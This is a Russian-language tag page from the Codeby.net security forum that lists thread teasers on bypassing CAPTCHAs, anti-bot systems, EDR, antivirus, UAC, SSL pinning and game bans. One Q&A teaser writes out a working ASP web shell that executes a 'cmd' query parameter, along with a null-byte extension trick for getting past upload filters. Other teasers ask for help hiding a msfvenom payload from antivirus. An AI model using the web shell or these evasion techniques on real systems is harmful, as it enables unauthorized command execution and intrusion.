bypass
Всё по теме «bypass» на форуме Codeby.net. Обсуждений: 22. Разборы, инструменты и практика по информационной безопасности.
-
На проверке Microsoft PerimeterX пал: RTF Labs Studio обходит закрытый Shadow DOM в cross-origin iframe
Разработчики RTF LABS STUDIO продолжают серию исследований антибот-систем. На этот раз под прицел попал Microsoft с его реализацией PerimeterX (HUMAN Security) Press & Hold. Команда использует собственную инфраструктуру для создания уникальных браузерных сессий: отдельные прокси, индивидуальные...- RTF_LABS_STUDIO
- Тема
- automation bypass cybersecurity microsoft perimeterx python reverse engineering selenium web scraping
- Ответы: 0
- Раздел: Безопасность веб-приложений
-
Статья Одна из самых сложных капч в мире — HUMAN Security (PerimeterX) — обойдена
Разработчики из команды RTF LABS STUDIO успешно реализовали алгоритм автоматического прохождения одной из самых сложных и продвинутых поведенческих защит на рынке — HUMAN Security (ранее PerimeterX) Press & Hold. Эта антифрод-система защищает крупнейшие мировые площадки (включая Walmart, Target...- RTF_LABS_STUDIO
- Тема
- anti-bot bypass cdp chrome devtools protocol fingerprint human security perimeterx press and hold python rtfox-browser shadow dom антифрод поведенческий анализ
- Ответы: 0
- Раздел: Безопасность веб-приложений
-
Статья Крепость из картона: обходим защиту от копирования на сайте
Кстати, помимо DevTools, curl и полного отключения JavaScript, в сети часто советуют еще один трюк - javascript-букмарклет. Это обычная закладка браузера, в поле URL которой вместо ссылки вставляется небольшой скрипт, снимающий обработчики oncopy, oncontextmenu и onselectstart прямо на открытой...- M4x
- Тема
- bypass copyrighting-protection curl curl парсинг devtools google cache inspector javascript onselectstart wayback machine web букмарклет веб-безопасность защита от копирования обход блокировки контента отключение javascript парсинг html
- Ответы: 1
- Раздел: Безопасность веб-приложений
-
Статья Google reCAPTCHA Hand Gesture Verification обойдена статичным изображением
Команда RTF Labs Studio обнаружила критическую уязвимость в новой биометрической системе Google — reCAPTCHA Hand Gesture Verification. Капча требует включить веб-камеру и выполнить жест (кулак, лайк, взмах), однако полностью обходится трансляцией обычного статичного файла через виртуальную...- RTF_LABS_STUDIO
- Тема
- bypass google liveness detection opencv pyvirtualcam recaptcha web automation антидетект биометрия виртуальная камера распознавание жестов
- Ответы: 0
- Раздел: Безопасность веб-приложений
-
Пентест 1С
Привет дорогие форумчане помогите найти инфу об уязвимостях в 1С. В основном сейчас интересует кто-нибудь скули пробовал ли тыкать в авторизацию. И есть ли bypass авторизации и тд За любую интересную инфу по этому вопросу отдельное спасибо)- teddy1337
- Тема
- 1с 7.7 bypass sql injection пентест хакинг
- Ответы: 2
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Статья Скрываясь на виду у всех. №2
Это вторая часть статьи о проксировании загрузки DLL для скрытия подозрительных следов стека, ведущих к выделенной пользователем области RX. Первая часть здесь, она обязательна к прочтению! Я не буду углубляться в то, как работает стек, потому что я уже рассказал об этом в предыдущей статье...- szybnev
- Тема
- asm bypass edr pentest red team reverse
- Ответы: 0
- Раздел: Threat Intel
-
Статья Скрываясь на виду у всех. №1
В этой статье представлен высокоуровневый обзор трассировки стека. Того, как EDR/AV используют трассировку для обнаружения, использования телеметрии ETWTI. Рассмотрим то, что можно сделать для её обхода. Итак, прежде чем мы обсудим уклонение, давайте сначала поймем, почему трассировка стека...- szybnev
- Тема
- bypass edr red team
- Ответы: 2
- Раздел: Мои статьи
-
Ошибка при загрузки оболочки asp
Привет) пытаюсь загрузить оболочку но сервер выдает ошибку по началу сервер не давал закидавать .asp файл file.asp <%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> потом я это обошел так: file.asp%00.jpg GIF89a; <%response.write...- Frintezza
- Тема
- asp.net bypass hacking pentest upload shell
- Ответы: 4
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Статья Charles. Обход API авторизации в Android приложении
1. Вступление Добрый день, уважаемые форумчане. Давно от меня не было статей, из-за того что проходил курс SQLiM aka SQL Injection Master от codeby. Хоть наш поток и закончился почти месяц назад, я хотел максимально закрепить пройденный материал и практиковался на разных ресурсах. Курс, кстате...- Gustavo Fring
- Тема
- api auth bypass
- Ответы: 7
- Раздел: Мои статьи
-
F
Как обойти бан в сетевой игре?
Я слышал , что может помочь vpn , изменение mac и hwid. Еще я слышал , что существует более простой способ с помощью внутриигровых консольных команд и\или параметров запуска . Существует ли такой способ? Бан хочу обойти в gmod .- FDFHdfh213
- Тема
- bypass garry's mod gmod обход бана онлайн игра сетевая игра
- Ответы: 5
- Раздел: Сетевая безопасность и беспроводные атаки
-
V
Как можно повысить score ReCAPTCHA v3?
Как можно повысить score ReCAPTCHA v3? Возможно ли обойти ReCAPTCHA v3 без сервисов на подобии rucaptcha? Как ReCAPTCHA v3 определяет score? Решил написать бота при помощи phantomjs , но score равен 0.1. Решил протестировать и написал бота при помощи Selenium + Firefox, в таком случает, score...- VectorAR
- Тема
- bot bypass javascript node.js phantomjs recaptcha silenium
- Ответы: 0
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
B
Юзинг эксплойтов
Всем привет. Недавно (хотя, уже давно) мне скинули ссылку с солянкой из эксплоитов UAC bypass - > hfiref0x/UACME. Собственно 2 проблемы: 1) Какие условия нужны, чтобы эксплойт сработал (в частности 5-ый, пока на нем сконцентрировался). Вроде как пробовал админский акк с настройками уведомлений...- Balabol
- Тема
- bypass exploit uac экслойт
- Ответы: 7
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
G
Статья "Фальшивые отпечатки пальцев". Обход сканеров с 3Д-печатью
В новых исследованиях, использовали технологию 3D-печати для байпаса сканеров отпечатков пальцев, и тестировали все это на мобильных устройствах Apple, Samsung и Microsoft. Новые исследования показали, что можно использовать технологию 3D-печати для создания "поддельных отпечатков пальцев"...- g00db0y
- Тема
- 3d printing bypass finger scanners fingerprint
- Ответы: 0
- Раздел: Мои статьи
-
Payload Bypassing Eset
Здравствуйте, попробовала создать пэйлойд используя Msfvenom и зашифровала шифром ShikatGaNai, в общем смогла скрыть от Avast, но ESET жестко палит, собственно прошу вас ответить на следующий вопрос: как скрыть пэйлоуд от антивируса ESET? если можно опишите пожалуйста более подробно. P.S...- alice_killer
- Тема
- bypass bypass av kali linux msfvenom payload trojan veil
- Ответы: 0
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Возможно ли использовать данное приложение в качестве Bypass UAC?
https://sourceforge.net/projects/runassystem/ Этой программой пол года назад запускал exe-шники от системы на своей Win10x64, возможно ли ее сжать до состояния эксплойта и приспособить к работе? Антивирусы не ругались, работала просто отлично. Вроде поддерживает запуск прямо с командной строки...- PresetX
- Тема
- bypass privileges escalation system uac uacbypass
- Ответы: 0
- Раздел: Вопросы и Ответы по ИБ (Q&A)
-
Статья Универсальный обход SSL pinning для андроид приложений
Привет всем, в этой статье, я объясню как обойти SSL pinning для андроид приложений используя Frida framework. Я попытаюсь объяснить все в деталях,четко и понятно. В этой статье будет рассмотрено: 1. Введение в Frida и SSL pinning 2. Требования 3. Настройка и установка 4. Установка Frida...- Tayrus
- Тема
- adb android burp bypass frida proxy ssl ssl pinn
- Ответы: 14
- Раздел: Мобильная безопасность
-
Проблема webshell как действовать дальше?
Заранее приношу извинения если создал не в том разделе( С поиском уязвимостей в web приложении и заливкой шелла никогда проблем не было. Но как всегда хочется большего ;) Собственно вопрос как просканировать и подобрать эксплойт для поднятия прав на удаленном web сервере, максимально...- Sa1nt
- Тема
- bind shell bypass linux root webshell поднятие прав
- Ответы: 2
- Раздел: Безопасность веб-приложений
-
Статья Атака ресурса с WhatWaf
Добрый вечер,Уважаемые Друзья,Форумчане и Дорогие Гости. Долго меня терзали мучения по-поводу появившихся новинок из инструментария. Но как верно говорится,что если чем-то не устроил авторский труд-пройди мимо. Поэтому,ранее планируемого обзора нового сканера уязвимостей ,не будет. А хочу...- Vertigo
- Тема
- bypass waf whatwaf
- Ответы: 0
- Раздел: Мои статьи
-
Статья morphHTA - Morphing Cobalt Strike PowerShell Evil HTA Generator
Добрый день,Уважаемые Форумчане,Гости и те,кто следит за изменениями в мире ИБ. Сегодня будем знакомиться с интересным и несколько таинственным инструментом. morphHTA - инструмент для реализации атаки Powershell. Информации о нём очень мало,то что видел повергло меня в растерянность и...- Vertigo
- Тема
- bypass hta html morph-hta morphhta
- Ответы: 11
- Раздел: Мои статьи
-
Статья Обход антивирусов. Антиэмуляция, обход сигнатур и все все все. Часть I.
Все части Часть II Привет! В этой статье мы обсудим и опробуем способы обхода антивирусов. Информация для подготовки статьи была взята отсюда. Обход антивирусов состоит из 2 больших шагов: Скрытие кода, который может быть опознан как вредоносный. В большинстве случаев это происходит при...- PingVinich
- Тема
- aviisfool bypass bypass av bypassavpingvinich malicous code malware pingvinich
- Ответы: 3
- Раздел: Мои статьи